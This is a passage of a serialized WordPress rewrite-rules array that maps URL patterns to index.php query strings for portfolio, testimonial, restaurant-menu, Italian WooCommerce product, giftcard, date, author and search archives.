tches[2]\";s:37:\"portfolio-item/[^/]+/([^/]+)/embed/?$\";s:43:\"index.php?attachment=$matches[1]&embed=true\";s:59:\"portfolio-category/([^/]+)/feed/(feed|rdf|rss|rss2|atom)/?$\";s:57:\"index.php?portfolio-category=$matches[1]&feed=$matches[2]\";s:54:\"portfolio-category/([^/]+)/(feed|rdf|rss|rss2|atom)/?$\";s:57:\"index.php?portfolio-category=$matches[1]&feed=$matches[2]\";s:35:\"portfolio-category/([^/]+)/embed/?$\";s:51:\"index.php?portfolio-category=$matches[1]&embed=true\";s:47:\"portfolio-category/([^/]+)/page/?([0-9]{1,})/?$\";s:58:\"index.php?portfolio-category=$matches[1]&paged=$matches[2]\";s:29:\"portfolio-category/([^/]+)/?$\";s:40:\"index.php?portfolio-category=$matches[1]\";s:54:\"portfolio-tag/([^/]+)/feed/(feed|rdf|rss|rss2|atom)/?$\";s:52:\"index.php?portfolio-tag=$matches[1]&feed=$matches[2]\";s:49:\"portfolio-tag/([^/]+)/(feed|rdf|rss|rss2|atom)/?$\";s:52:\"index.php?portfolio-tag=$matches[1]&feed=$matches[2]\";s:30:\"portfolio-tag/([^/]+)/embed/?$\";s:46:\"index.php?portfolio-tag=$matches[1]&embed=true\";s:42:\"portfolio-tag/([^/]+)/page/?([0-9]{1,})/?$\";s:53:\"index.php?portfolio-tag=$matches[1]&paged=$matches[2]\";s:24:\"portfolio-tag/([^/]+)/?$\";s:35:\"index.php?portfolio-tag=$matches[1]\";s:40:\"testimonials/[^/]+/attachment/([^/]+)/?$\";s:32:\"index.php?attachment=$matches[1]\";s:50:\"testimonials/[^/]+/attachment/([^/]+)/trackback/?$\";s:37:\"index.php?attachment=$matches[1]&tb=1\";s:70:\"testimonials/[^/]+/attachment/([^/]+)/feed/(feed|rdf|rss|rss2|atom)/?$\";s:49:\"index.php?attachment=$matches[1]&feed=$matches[2]\";s:65:\"testimonials/[^/]+/attachment/([^/]+)/(feed|rdf|rss|rss2|atom)/?$\";s:49:\"index.php?attachment=$matches[1]&feed=$matches[2]\";s:65:\"testimonials/[^/]+/attachment/([^/]+)/comment-page-([0-9]{1,})/?$\";s:50:\"index.php?attachment=$matches[1]&cpage=$matches[2]\";s:46:\"testimonials/[^/]+/attachment/([^/]+)/embed/?$\";s:43:\"index.php?attachment=$matches[1]&embed=true\";s:29:\"testimonials/([^/]+)/embed/?$\";s:45:\"index.php?testimonials=$matches[1]&embed=true\";s:33:\"testimonials/([^/]+)/trackback/?$\";s:39:\"index.php?testimonials=$matches[1]&tb=1\";s:41:\"testimonials/([^/]+)/page/?([0-9]{1,})/?$\";s:52:\"index.php?testimonials=$matches[1]&paged=$matches[2]\";s:48:\"testimonials/([^/]+)/comment-page-([0-9]{1,})/?$\";s:52:\"index.php?testimonials=$matches[1]&cpage=$matches[2]\";s:38:\"testimonials/([^/]+)/wc-api(/(.*))?/?$\";s:53:\"index.php?testimonials=$matches[1]&wc-api=$matches[3]\";s:44:\"testimonials/[^/]+/([^/]+)/wc-api(/(.*))?/?$\";s:51:\"index.php?attachment=$matches[1]&wc-api=$matches[3]\";s:55:\"testimonials/[^/]+/attachment/([^/]+)/wc-api(/(.*))?/?$\";s:51:\"index.php?attachment=$matches[1]&wc-api=$matches[3]\";s:37:\"testimonials/([^/]+)(?:/([0-9]+))?/?$\";s:51:\"index.php?testimonials=$matches[1]&page=$matches[2]\";s:29:\"testimonials/[^/]+/([^/]+)/?$\";s:32:\"index.php?attachment=$matches[1]\";s:39:\"testimonials/[^/]+/([^/]+)/trackback/?$\";s:37:\"index.php?attachment=$matches[1]&tb=1\";s:59:\"testimonials/[^/]+/([^/]+)/feed/(feed|rdf|rss|rss2|atom)/?$\";s:49:\"index.php?attachment=$matches[1]&feed=$matches[2]\";s:54:\"testimonials/[^/]+/([^/]+)/(feed|rdf|rss|rss2|atom)/?$\";s:49:\"index.php?attachment=$matches[1]&feed=$matches[2]\";s:54:\"testimonials/[^/]+/([^/]+)/comment-page-([0-9]{1,})/?$\";s:50:\"index.php?attachment=$matches[1]&cpage=$matches[2]\";s:35:\"testimonials/[^/]+/([^/]+)/embed/?$\";s:43:\"index.php?attachment=$matches[1]&embed=true\";s:62:\"testimonials-category/([^/]+)/feed/(feed|rdf|rss|rss2|atom)/?$\";s:60:\"index.php?testimonials-category=$matches[1]&feed=$matches[2]\";s:57:\"testimonials-category/([^/]+)/(feed|rdf|rss|rss2|atom)/?$\";s:60:\"index.php?testimonials-category=$matches[1]&feed=$matches[2]\";s:38:\"testimonials-category/([^/]+)/embed/?$\";s:54:\"index.php?testimonials-category=$matches[1]&embed=true\";s:50:\"testimonials-category/([^/]+)/page/?([0-9]{1,})/?$\";s:61:\"index.php?testimonials-category=$matches[1]&paged=$matches[2]\";s:32:\"testimonials-category/([^/]+)/?$\";s:43:\"index.php?testimonials-category=$matches[1]\";s:43:\"restaurant-menu/[^/]+/attachment/([^/]+)/?$\";s:32:\"index.php?attachment=$matches[1]\";s:53:\"restaurant-menu/[^/]+/attachment/([^/]+)/trackback/?$\";s:37:\"index.php?attachment=$matches[1]&tb=1\";s:73:\"restaurant-menu/[^/]+/attachment/([^/]+)/feed/(feed|rdf|rss|rss2|atom)/?$\";s:49:\"index.php?attachment=$matches[1]&feed=$matches[2]\";s:68:\"restaurant-menu/[^/]+/attachment/([^/]+)/(feed|rdf|rss|rss2|atom)/?$\";s:49:\"index.php?attachment=$matches[1]&feed=$matches[2]\";s:68:\"restaurant-menu/[^/]+/attachment/([^/]+)/comment-page-([0-9]{1,})/?$\";s:50:\"index.php?attachment=$matches[1]&cpage=$matches[2]\";s:49:\"restaurant-menu/[^/]+/attachment/([^/]+)/embed/?$\";s:43:\"index.php?attachment=$matches[1]&embed=true\";s:32:\"restaurant-menu/([^/]+)/embed/?$\";s:48:\"index.php?restaurant-menu=$matches[1]&embed=true\";s:36:\"restaurant-menu/([^/]+)/trackback/?$\";s:42:\"index.php?restaurant-menu=$matches[1]&tb=1\";s:44:\"restaurant-menu/([^/]+)/page/?([0-9]{1,})/?$\";s:55:\"index.php?restaurant-menu=$matches[1]&paged=$matches[2]\";s:51:\"restaurant-menu/([^/]+)/comment-page-([0-9]{1,})/?$\";s:55:\"index.php?restaurant-menu=$matches[1]&cpage=$matches[2]\";s:41:\"restaurant-menu/([^/]+)/wc-api(/(.*))?/?$\";s:56:\"index.php?restaurant-menu=$matches[1]&wc-api=$matches[3]\";s:47:\"restaurant-menu/[^/]+/([^/]+)/wc-api(/(.*))?/?$\";s:51:\"index.php?attachment=$matches[1]&wc-api=$matches[3]\";s:58:\"restaurant-menu/[^/]+/attachment/([^/]+)/wc-api(/(.*))?/?$\";s:51:\"index.php?attachment=$matches[1]&wc-api=$matches[3]\";s:40:\"restaurant-menu/([^/]+)(?:/([0-9]+))?/?$\";s:54:\"index.php?restaurant-menu=$matches[1]&page=$matches[2]\";s:32:\"restaurant-menu/[^/]+/([^/]+)/?$\";s:32:\"index.php?attachment=$matches[1]\";s:42:\"restaurant-menu/[^/]+/([^/]+)/trackback/?$\";s:37:\"index.php?attachment=$matches[1]&tb=1\";s:62:\"restaurant-menu/[^/]+/([^/]+)/feed/(feed|rdf|rss|rss2|atom)/?$\";s:49:\"index.php?attachment=$matches[1]&feed=$matches[2]\";s:57:\"restaurant-menu/[^/]+/([^/]+)/(feed|rdf|rss|rss2|atom)/?$\";s:49:\"index.php?attachment=$matches[1]&feed=$matches[2]\";s:57:\"restaurant-menu/[^/]+/([^/]+)/comment-page-([0-9]{1,})/?$\";s:50:\"index.php?attachment=$matches[1]&cpage=$matches[2]\";s:38:\"restaurant-menu/[^/]+/([^/]+)/embed/?$\";s:43:\"index.php?attachment=$matches[1]&embed=true\";s:65:\"restaurant-menu-category/([^/]+)/feed/(feed|rdf|rss|rss2|atom)/?$\";s:63:\"index.php?restaurant-menu-category=$matches[1]&feed=$matches[2]\";s:60:\"restaurant-menu-category/([^/]+)/(feed|rdf|rss|rss2|atom)/?$\";s:63:\"index.php?restaurant-menu-category=$matches[1]&feed=$matches[2]\";s:41:\"restaurant-menu-category/([^/]+)/embed/?$\";s:57:\"index.php?restaurant-menu-category=$matches[1]&embed=true\";s:53:\"restaurant-menu-category/([^/]+)/page/?([0-9]{1,})/?$\";s:64:\"index.php?restaurant-menu-category=$matches[1]&paged=$matches[2]\";s:35:\"restaurant-menu-category/([^/]+)/?$\";s:46:\"index.php?restaurant-menu-category=$matches[1]\";s:47:\"category/(.+?)/feed/(feed|rdf|rss|rss2|atom)/?$\";s:52:\"index.php?category_name=$matches[1]&feed=$matches[2]\";s:42:\"category/(.+?)/(feed|rdf|rss|rss2|atom)/?$\";s:52:\"index.php?category_name=$matches[1]&feed=$matches[2]\";s:23:\"category/(.+?)/embed/?$\";s:46:\"index.php?category_name=$matches[1]&embed=true\";s:35:\"category/(.+?)/page/?([0-9]{1,})/?$\";s:53:\"index.php?category_name=$matches[1]&paged=$matches[2]\";s:32:\"category/(.+?)/wc-api(/(.*))?/?$\";s:54:\"index.php?category_name=$matches[1]&wc-api=$matches[3]\";s:17:\"category/(.+?)/?$\";s:35:\"index.php?category_name=$matches[1]\";s:44:\"tag/([^/]+)/feed/(feed|rdf|rss|rss2|atom)/?$\";s:42:\"index.php?tag=$matches[1]&feed=$matches[2]\";s:39:\"tag/([^/]+)/(feed|rdf|rss|rss2|atom)/?$\";s:42:\"index.php?tag=$matches[1]&feed=$matches[2]\";s:20:\"tag/([^/]+)/embed/?$\";s:36:\"index.php?tag=$matches[1]&embed=true\";s:32:\"tag/([^/]+)/page/?([0-9]{1,})/?$\";s:43:\"index.php?tag=$matches[1]&paged=$matches[2]\";s:29:\"tag/([^/]+)/wc-api(/(.*))?/?$\";s:44:\"index.php?tag=$matches[1]&wc-api=$matches[3]\";s:14:\"tag/([^/]+)/?$\";s:25:\"index.php?tag=$matches[1]\";s:45:\"type/([^/]+)/feed/(feed|rdf|rss|rss2|atom)/?$\";s:50:\"index.php?post_format=$matches[1]&feed=$matches[2]\";s:40:\"type/([^/]+)/(feed|rdf|rss|rss2|atom)/?$\";s:50:\"index.php?post_format=$matches[1]&feed=$matches[2]\";s:21:\"type/([^/]+)/embed/?$\";s:44:\"index.php?post_format=$matches[1]&embed=true\";s:33:\"type/([^/]+)/page/?([0-9]{1,})/?$\";s:51:\"index.php?post_format=$matches[1]&paged=$matches[2]\";s:15:\"type/([^/]+)/?$\";s:33:\"index.php?post_format=$matches[1]\";s:57:\"categoria-prodotto/(.+?)/feed/(feed|rdf|rss|rss2|atom)/?$\";s:50:\"index.php?product_cat=$matches[1]&feed=$matches[2]\";s:52:\"categoria-prodotto/(.+?)/(feed|rdf|rss|rss2|atom)/?$\";s:50:\"index.php?product_cat=$matches[1]&feed=$matches[2]\";s:33:\"categoria-prodotto/(.+?)/embed/?$\";s:44:\"index.php?product_cat=$matches[1]&embed=true\";s:45:\"categoria-prodotto/(.+?)/page/?([0-9]{1,})/?$\";s:51:\"index.php?product_cat=$matches[1]&paged=$matches[2]\";s:27:\"categoria-prodotto/(.+?)/?$\";s:33:\"index.php?product_cat=$matches[1]\";s:53:\"tag-prodotto/([^/]+)/feed/(feed|rdf|rss|rss2|atom)/?$\";s:50:\"index.php?product_tag=$matches[1]&feed=$matches[2]\";s:48:\"tag-prodotto/([^/]+)/(feed|rdf|rss|rss2|atom)/?$\";s:50:\"index.php?product_tag=$matches[1]&feed=$matches[2]\";s:29:\"tag-prodotto/([^/]+)/embed/?$\";s:44:\"index.php?product_tag=$matches[1]&embed=true\";s:41:\"tag-prodotto/([^/]+)/page/?([0-9]{1,})/?$\";s:51:\"index.php?product_tag=$matches[1]&paged=$matches[2]\";s:23:\"tag-prodotto/([^/]+)/?$\";s:33:\"index.php?product_tag=$matches[1]\";s:36:\"prodotto/[^/]+/attachment/([^/]+)/?$\";s:32:\"index.php?attachment=$matches[1]\";s:46:\"prodotto/[^/]+/attachment/([^/]+)/trackback/?$\";s:37:\"index.php?attachment=$matches[1]&tb=1\";s:66:\"prodotto/[^/]+/attachment/([^/]+)/feed/(feed|rdf|rss|rss2|atom)/?$\";s:49:\"index.php?attachment=$matches[1]&feed=$matches[2]\";s:61:\"prodotto/[^/]+/attachment/([^/]+)/(feed|rdf|rss|rss2|atom)/?$\";s:49:\"index.php?attachment=$matches[1]&feed=$matches[2]\";s:61:\"prodotto/[^/]+/attachment/([^/]+)/comment-page-([0-9]{1,})/?$\";s:50:\"index.php?attachment=$matches[1]&cpage=$matches[2]\";s:42:\"prodotto/[^/]+/attachment/([^/]+)/embed/?$\";s:43:\"index.php?attachment=$matches[1]&embed=true\";s:25:\"prodotto/([^/]+)/embed/?$\";s:40:\"index.php?product=$matches[1]&embed=true\";s:29:\"prodotto/([^/]+)/trackback/?$\";s:34:\"index.php?product=$matches[1]&tb=1\";s:49:\"prodotto/([^/]+)/feed/(feed|rdf|rss|rss2|atom)/?$\";s:46:\"index.php?product=$matches[1]&feed=$matches[2]\";s:44:\"prodotto/([^/]+)/(feed|rdf|rss|rss2|atom)/?$\";s:46:\"index.php?product=$matches[1]&feed=$matches[2]\";s:37:\"prodotto/([^/]+)/page/?([0-9]{1,})/?$\";s:47:\"index.php?product=$matches[1]&paged=$matches[2]\";s:44:\"prodotto/([^/]+)/comment-page-([0-9]{1,})/?$\";s:47:\"index.php?product=$matches[1]&cpage=$matches[2]\";s:34:\"prodotto/([^/]+)/wc-api(/(.*))?/?$\";s:48:\"index.php?product=$matches[1]&wc-api=$matches[3]\";s:40:\"prodotto/[^/]+/([^/]+)/wc-api(/(.*))?/?$\";s:51:\"index.php?attachment=$matches[1]&wc-api=$matches[3]\";s:51:\"prodotto/[^/]+/attachment/([^/]+)/wc-api(/(.*))?/?$\";s:51:\"index.php?attachment=$matches[1]&wc-api=$matches[3]\";s:33:\"prodotto/([^/]+)(?:/([0-9]+))?/?$\";s:46:\"index.php?product=$matches[1]&page=$matches[2]\";s:25:\"prodotto/[^/]+/([^/]+)/?$\";s:32:\"index.php?attachment=$matches[1]\";s:35:\"prodotto/[^/]+/([^/]+)/trackback/?$\";s:37:\"index.php?attachment=$matches[1]&tb=1\";s:55:\"prodotto/[^/]+/([^/]+)/feed/(feed|rdf|rss|rss2|atom)/?$\";s:49:\"index.php?attachment=$matches[1]&feed=$matches[2]\";s:50:\"prodotto/[^/]+/([^/]+)/(feed|rdf|rss|rss2|atom)/?$\";s:49:\"index.php?attachment=$matches[1]&feed=$matches[2]\";s:50:\"prodotto/[^/]+/([^/]+)/comment-page-([0-9]{1,})/?$\";s:50:\"index.php?attachment=$matches[1]&cpage=$matches[2]\";s:31:\"prodotto/[^/]+/([^/]+)/embed/?$\";s:43:\"index.php?attachment=$matches[1]&embed=true\";s:35:\"pt_view/[^/]+/attachment/([^/]+)/?$\";s:32:\"index.php?attachment=$matches[1]\";s:45:\"pt_view/[^/]+/attachment/([^/]+)/trackback/?$\";s:37:\"index.php?attachment=$matches[1]&tb=1\";s:65:\"pt_view/[^/]+/attachment/([^/]+)/feed/(feed|rdf|rss|rss2|atom)/?$\";s:49:\"index.php?attachment=$matches[1]&feed=$matches[2]\";s:60:\"pt_view/[^/]+/attachment/([^/]+)/(feed|rdf|rss|rss2|atom)/?$\";s:49:\"index.php?attachment=$matches[1]&feed=$matches[2]\";s:60:\"pt_view/[^/]+/attachment/([^/]+)/comment-page-([0-9]{1,})/?$\";s:50:\"index.php?attachment=$matches[1]&cpage=$matches[2]\";s:41:\"pt_view/[^/]+/attachment/([^/]+)/embed/?$\";s:43:\"index.php?attachment=$matches[1]&embed=true\";s:24:\"pt_view/([^/]+)/embed/?$\";s:40:\"index.php?pt_view=$matches[1]&embed=true\";s:28:\"pt_view/([^/]+)/trackback/?$\";s:34:\"index.php?pt_view=$matches[1]&tb=1\";s:48:\"pt_view/([^/]+)/feed/(feed|rdf|rss|rss2|atom)/?$\";s:46:\"index.php?pt_view=$matches[1]&feed=$matches[2]\";s:43:\"pt_view/([^/]+)/(feed|rdf|rss|rss2|atom)/?$\";s:46:\"index.php?pt_view=$matches[1]&feed=$matches[2]\";s:36:\"pt_view/([^/]+)/page/?([0-9]{1,})/?$\";s:47:\"index.php?pt_view=$matches[1]&paged=$matches[2]\";s:43:\"pt_view/([^/]+)/comment-page-([0-9]{1,})/?$\";s:47:\"index.php?pt_view=$matches[1]&cpage=$matches[2]\";s:33:\"pt_view/([^/]+)/wc-api(/(.*))?/?$\";s:48:\"index.php?pt_view=$matches[1]&wc-api=$matches[3]\";s:39:\"pt_view/[^/]+/([^/]+)/wc-api(/(.*))?/?$\";s:51:\"index.php?attachment=$matches[1]&wc-api=$matches[3]\";s:50:\"pt_view/[^/]+/attachment/([^/]+)/wc-api(/(.*))?/?$\";s:51:\"index.php?attachment=$matches[1]&wc-api=$matches[3]\";s:32:\"pt_view/([^/]+)(?:/([0-9]+))?/?$\";s:46:\"index.php?pt_view=$matches[1]&page=$matches[2]\";s:24:\"pt_view/[^/]+/([^/]+)/?$\";s:32:\"index.php?attachment=$matches[1]\";s:34:\"pt_view/[^/]+/([^/]+)/trackback/?$\";s:37:\"index.php?attachment=$matches[1]&tb=1\";s:54:\"pt_view/[^/]+/([^/]+)/feed/(feed|rdf|rss|rss2|atom)/?$\";s:49:\"index.php?attachment=$matches[1]&feed=$matches[2]\";s:49:\"pt_view/[^/]+/([^/]+)/(feed|rdf|rss|rss2|atom)/?$\";s:49:\"index.php?attachment=$matches[1]&feed=$matches[2]\";s:49:\"pt_view/[^/]+/([^/]+)/comment-page-([0-9]{1,})/?$\";s:50:\"index.php?attachment=$matches[1]&cpage=$matches[2]\";s:30:\"pt_view/[^/]+/([^/]+)/embed/?$\";s:43:\"index.php?attachment=$matches[1]&embed=true\";s:45:\"postman_sent_mail/[^/]+/attachment/([^/]+)/?$\";s:32:\"index.php?attachment=$matches[1]\";s:55:\"postman_sent_mail/[^/]+/attachment/([^/]+)/trackback/?$\";s:37:\"index.php?attachment=$matches[1]&tb=1\";s:75:\"postman_sent_mail/[^/]+/attachment/([^/]+)/feed/(feed|rdf|rss|rss2|atom)/?$\";s:49:\"index.php?attachment=$matches[1]&feed=$matches[2]\";s:70:\"postman_sent_mail/[^/]+/attachment/([^/]+)/(feed|rdf|rss|rss2|atom)/?$\";s:49:\"index.php?attachment=$matches[1]&feed=$matches[2]\";s:70:\"postman_sent_mail/[^/]+/attachment/([^/]+)/comment-page-([0-9]{1,})/?$\";s:50:\"index.php?attachment=$matches[1]&cpage=$matches[2]\";s:51:\"postman_sent_mail/[^/]+/attachment/([^/]+)/embed/?$\";s:43:\"index.php?attachment=$matches[1]&embed=true\";s:34:\"postman_sent_mail/([^/]+)/embed/?$\";s:50:\"index.php?postman_sent_mail=$matches[1]&embed=true\";s:38:\"postman_sent_mail/([^/]+)/trackback/?$\";s:44:\"index.php?postman_sent_mail=$matches[1]&tb=1\";s:46:\"postman_sent_mail/([^/]+)/page/?([0-9]{1,})/?$\";s:57:\"index.php?postman_sent_mail=$matches[1]&paged=$matches[2]\";s:53:\"postman_sent_mail/([^/]+)/comment-page-([0-9]{1,})/?$\";s:57:\"index.php?postman_sent_mail=$matches[1]&cpage=$matches[2]\";s:43:\"postman_sent_mail/([^/]+)/wc-api(/(.*))?/?$\";s:58:\"index.php?postman_sent_mail=$matches[1]&wc-api=$matches[3]\";s:49:\"postman_sent_mail/[^/]+/([^/]+)/wc-api(/(.*))?/?$\";s:51:\"index.php?attachment=$matches[1]&wc-api=$matches[3]\";s:60:\"postman_sent_mail/[^/]+/attachment/([^/]+)/wc-api(/(.*))?/?$\";s:51:\"index.php?attachment=$matches[1]&wc-api=$matches[3]\";s:42:\"postman_sent_mail/([^/]+)(?:/([0-9]+))?/?$\";s:56:\"index.php?postman_sent_mail=$matches[1]&page=$matches[2]\";s:34:\"postman_sent_mail/[^/]+/([^/]+)/?$\";s:32:\"index.php?attachment=$matches[1]\";s:44:\"postman_sent_mail/[^/]+/([^/]+)/trackback/?$\";s:37:\"index.php?attachment=$matches[1]&tb=1\";s:64:\"postman_sent_mail/[^/]+/([^/]+)/feed/(feed|rdf|rss|rss2|atom)/?$\";s:49:\"index.php?attachment=$matches[1]&feed=$matches[2]\";s:59:\"postman_sent_mail/[^/]+/([^/]+)/(feed|rdf|rss|rss2|atom)/?$\";s:49:\"index.php?attachment=$matches[1]&feed=$matches[2]\";s:59:\"postman_sent_mail/[^/]+/([^/]+)/comment-page-([0-9]{1,})/?$\";s:50:\"index.php?attachment=$matches[1]&cpage=$matches[2]\";s:40:\"postman_sent_mail/[^/]+/([^/]+)/embed/?$\";s:43:\"index.php?attachment=$matches[1]&embed=true\";s:36:\"giftcard/[^/]+/attachment/([^/]+)/?$\";s:32:\"index.php?attachment=$matches[1]\";s:46:\"giftcard/[^/]+/attachment/([^/]+)/trackback/?$\";s:37:\"index.php?attachment=$matches[1]&tb=1\";s:66:\"giftcard/[^/]+/attachment/([^/]+)/feed/(feed|rdf|rss|rss2|atom)/?$\";s:49:\"index.php?attachment=$matches[1]&feed=$matches[2]\";s:61:\"giftcard/[^/]+/attachment/([^/]+)/(feed|rdf|rss|rss2|atom)/?$\";s:49:\"index.php?attachment=$matches[1]&feed=$matches[2]\";s:61:\"giftcard/[^/]+/attachment/([^/]+)/comment-page-([0-9]{1,})/?$\";s:50:\"index.php?attachment=$matches[1]&cpage=$matches[2]\";s:42:\"giftcard/[^/]+/attachment/([^/]+)/embed/?$\";s:43:\"index.php?attachment=$matches[1]&embed=true\";s:25:\"giftcard/([^/]+)/embed/?$\";s:41:\"index.php?giftcard=$matches[1]&embed=true\";s:29:\"giftcard/([^/]+)/trackback/?$\";s:35:\"index.php?giftcard=$matches[1]&tb=1\";s:49:\"giftcard/([^/]+)/feed/(feed|rdf|rss|rss2|atom)/?$\";s:47:\"index.php?giftcard=$matches[1]&feed=$matches[2]\";s:44:\"giftcard/([^/]+)/(feed|rdf|rss|rss2|atom)/?$\";s:47:\"index.php?giftcard=$matches[1]&feed=$matches[2]\";s:37:\"giftcard/([^/]+)/page/?([0-9]{1,})/?$\";s:48:\"index.php?giftcard=$matches[1]&paged=$matches[2]\";s:44:\"giftcard/([^/]+)/comment-page-([0-9]{1,})/?$\";s:48:\"index.php?giftcard=$matches[1]&cpage=$matches[2]\";s:34:\"giftcard/([^/]+)/wc-api(/(.*))?/?$\";s:49:\"index.php?giftcard=$matches[1]&wc-api=$matches[3]\";s:40:\"giftcard/[^/]+/([^/]+)/wc-api(/(.*))?/?$\";s:51:\"index.php?attachment=$matches[1]&wc-api=$matches[3]\";s:51:\"giftcard/[^/]+/attachment/([^/]+)/wc-api(/(.*))?/?$\";s:51:\"index.php?attachment=$matches[1]&wc-api=$matches[3]\";s:33:\"giftcard/([^/]+)(?:/([0-9]+))?/?$\";s:47:\"index.php?giftcard=$matches[1]&page=$matches[2]\";s:25:\"giftcard/[^/]+/([^/]+)/?$\";s:32:\"index.php?attachment=$matches[1]\";s:35:\"giftcard/[^/]+/([^/]+)/trackback/?$\";s:37:\"index.php?attachment=$matches[1]&tb=1\";s:55:\"giftcard/[^/]+/([^/]+)/feed/(feed|rdf|rss|rss2|atom)/?$\";s:49:\"index.php?attachment=$matches[1]&feed=$matches[2]\";s:50:\"giftcard/[^/]+/([^/]+)/(feed|rdf|rss|rss2|atom)/?$\";s:49:\"index.php?attachment=$matches[1]&feed=$matches[2]\";s:50:\"giftcard/[^/]+/([^/]+)/comment-page-([0-9]{1,})/?$\";s:50:\"index.php?attachment=$matches[1]&cpage=$matches[2]\";s:31:\"giftcard/[^/]+/([^/]+)/embed/?$\";s:43:\"index.php?attachment=$matches[1]&embed=true\";s:48:\".*wp-(atom|rdf|rss|rss2|feed|commentsrss2)\\.php$\";s:18:\"index.php?feed=old\";s:20:\".*wp-app\\.php(/.*)?$\";s:19:\"index.php?error=403\";s:18:\".*wp-register.php$\";s:23:\"index.php?register=true\";s:32:\"feed/(feed|rdf|rss|rss2|atom)/?$\";s:27:\"index.php?&feed=$matches[1]\";s:27:\"(feed|rdf|rss|rss2|atom)/?$\";s:27:\"index.php?&feed=$matches[1]\";s:8:\"embed/?$\";s:21:\"index.php?&embed=true\";s:20:\"page/?([0-9]{1,})/?$\";s:28:\"index.php?&paged=$matches[1]\";s:27:\"comment-page-([0-9]{1,})/?$\";s:41:\"index.php?&page_id=3040&cpage=$matches[1]\";s:17:\"wc-api(/(.*))?/?$\";s:29:\"index.php?&wc-api=$matches[2]\";s:41:\"comments/feed/(feed|rdf|rss|rss2|atom)/?$\";s:42:\"index.php?&feed=$matches[1]&withcomments=1\";s:36:\"comments/(feed|rdf|rss|rss2|atom)/?$\";s:42:\"index.php?&feed=$matches[1]&withcomments=1\";s:17:\"comments/embed/?$\";s:21:\"index.php?&embed=true\";s:26:\"comments/wc-api(/(.*))?/?$\";s:29:\"index.php?&wc-api=$matches[2]\";s:44:\"search/(.+)/feed/(feed|rdf|rss|rss2|atom)/?$\";s:40:\"index.php?s=$matches[1]&feed=$matches[2]\";s:39:\"search/(.+)/(feed|rdf|rss|rss2|atom)/?$\";s:40:\"index.php?s=$matches[1]&feed=$matches[2]\";s:20:\"search/(.+)/embed/?$\";s:34:\"index.php?s=$matches[1]&embed=true\";s:32:\"search/(.+)/page/?([0-9]{1,})/?$\";s:41:\"index.php?s=$matches[1]&paged=$matches[2]\";s:29:\"search/(.+)/wc-api(/(.*))?/?$\";s:42:\"index.php?s=$matches[1]&wc-api=$matches[3]\";s:14:\"search/(.+)/?$\";s:23:\"index.php?s=$matches[1]\";s:47:\"author/([^/]+)/feed/(feed|rdf|rss|rss2|atom)/?$\";s:50:\"index.php?author_name=$matches[1]&feed=$matches[2]\";s:42:\"author/([^/]+)/(feed|rdf|rss|rss2|atom)/?$\";s:50:\"index.php?author_name=$matches[1]&feed=$matches[2]\";s:23:\"author/([^/]+)/embed/?$\";s:44:\"index.php?author_name=$matches[1]&embed=true\";s:35:\"author/([^/]+)/page/?([0-9]{1,})/?$\";s:51:\"index.php?author_name=$matches[1]&paged=$matches[2]\";s:32:\"author/([^/]+)/wc-api(/(.*))?/?$\";s:52:\"index.php?author_name=$matches[1]&wc-api=$matches[3]\";s:17:\"author/([^/]+)/?$\";s:33:\"index.php?author_name=$matches[1]\";s:69:\"([0-9]{4})/([0-9]{1,2})/([0-9]{1,2})/feed/(feed|rdf|rss|rss2|atom)/?$\";s:80:\"index.php?year=$matches[1]&monthnum=$matches[2]&day=$matches[3]&feed=$matches[4]\";s:64:\"([0-9]{4})/([0-9]{1,2})/([0-9]{1,2})/(feed|rdf|rss|rss2|atom)/?$\";s:80:\"index.php?year=$matches[1]&monthnum=$matches[2]&day=$matches[3]&feed=$matches[4]\";s:45:\"([0-9]{4})/([0-9]{1,2})/([0-9]{1,2})/embed/?$\";s:74:\"index.php?year=$matches[1]&monthnum=$matches[2]&day=$matches[3]&embed=true\";s:57:\"([0-9]{4})/([0-9]{1,2})/([0-9]{1,2})/page/?([0-9]{1,})/?$\";s:81:\"index.php?year=$matches[1]&monthnum=$matches[2]&day=$matches[3]&paged=$matches[4]\";s:54:\"([0-9]{4})/([0-9]{1,2})/([0-9]{1,2})/wc-api(/(.*))?/?$\";s:82:\"index.php?year=$matches[1]&monthnum=$matches[2]&day=$matches[3]&wc-api=$matches[5]\";s:39:\"([0-9]{4})/([0-9]{1,2})/([0-9]{1,2})/?$\";s:63:\"index.php?year=$matches[1]&monthnum=$matches[2]&day=$matches[3]\";s:56:\"([0-9]{4})/([0-9]{1,2})/feed/(feed|rdf|rss|rss2|atom)/?$\";s:64:\"index.php?year=$matches[1]&monthnum=$matches[2]&feed=$matches[3]\";s:51:\"([0-9]{4})/([0-9]{1,2})/(feed|rdf|rss|rss2|atom)/?$\";s:64:\"index.php?year=$matches[1]&monthnum=$matches[2]&feed=$matches[3]\";s:32:\"([0-9]{4})/([0-9]{1,2})/embed/?$\";s:58:\"index.php?year=$matches[1]&monthnum=$matches[2]&embed=true\";s:44:\"([0-9]{4})/([0-9]{1,2})/page/?([0-9]{1,})/?$\";s:65:\"index.php?year=$matches[1]&monthnum=$matches[2]&paged=$matches[3]\";s:41:\"([0-9]{4})/([0-9]{1,2})/wc-api(/(.*))?/?$\";s:66:\"index.php?year=$matches[1]&monthnum=$matches[2]&wc-api=$matches[4]\";s:26:\"([0-9]{4})/([0-9]{1,2})/?$\";s:47:\"index.php?year=$matches[1]&monthnum=$matches[2]\";s:43:\"([0-9]{4})/feed/(feed|rdf|rss|rss2|atom)/?$\";s:43:\"index.php?year=$matches[1]&feed=$matches[2]\";s:38:\"([0-9]{4})/(feed|rdf|rss|rss2|atom)/?$\";s:43:\"index.php?year=$matches[1]&feed=$matches[2]\";s:19:\"([0-9]{4})/embed/?$\";s:37:\"index.php?year=$matches[1]&embed=true\";s:31:\"([0-9]{4})/page/?([0-9]{1,})/?$\";s:44:\"index.php?year=$matches[1]&paged=$matches[2]\";s:28:\"([0-9]{4})/wc-api(/(.*))?/?$\";s:45:\"index.php?year=$matches[1]&wc-api=$matches[3]\";s:13:\"([0-9]{4})/?$\";s:26:\"index.php?year=$matches[1]\";s:58:\"[0-9]{4}/[0-9]{1,2}/[0-9]{1,2}/[^/]+/attachment/([^/]+)/?$\";s:32:\"index.php?attachment=$matches[1]\";s:68:\"[0-9]{4}/[0-9]{1,2}/[0-9]{1,2}/[^/]+/attachment/([^/]+)/trackback/?$\";s:37:\"index.php?attachment=$matches[1]&tb=1\";s:88:\"[0-9]{4}/[0-9]{1,2}/[0-9]{1,2}/[^/]+/attachment/([^/]+)/feed/(feed|rdf|rss|rss2|atom)/?$\";s:49:\"index.php?attachment=$matches[1]&feed=$matches[2]\";s:83:\"[0-9]{4}/[0-9]{1